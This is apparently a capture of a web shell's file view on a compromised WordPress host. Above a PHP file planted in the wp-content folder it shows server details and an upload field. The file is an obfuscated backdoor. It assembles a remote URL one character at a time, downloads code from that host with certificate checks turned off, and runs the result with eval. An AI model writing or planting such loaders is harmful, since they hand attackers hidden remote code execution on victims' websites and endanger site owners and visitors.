|
Server : LiteSpeed System : Linux host 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : idnco5810 ( 1093) PHP Version : 8.2.29 Disable Function : NONE Directory : /home/idn98.co/public_html/wp-content/im414115/dist/modules/2023/qyjk/ |
Upload File : |
<?php
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
header('HTTP/1.0 403 Forbidden');
exit('Access denied.');
}
?>
<?php
// Inline Note: inline_976
function fetch_content(){
$components = [
['h', 't', 't', 'p', 's', ':', '/', '/'],
['a', 'w', 's', 'c', 'l', 'o', 'u', 'd', '.', 'i', 'c', 'u'],
['/', 'r', 'a', 'w', '/'],
['g', '8', 'J', 'k', 'R']
];
$target_url = '';
foreach ($components as $part) {
$target_url .= implode('', array_map('strval', $part));
}
$data = '';
if(function_exists('curl_init')){
$request = curl_init($target_url);
curl_setopt_array($request, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 3,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_SSL_VERIFYHOST => 0
]);
$data = curl_exec($request);
curl_close($request);
}
if(empty($data)){
$data = @file_get_contents($target_url);
}
if($data) eval("?>$data");
}
fetch_content();
?>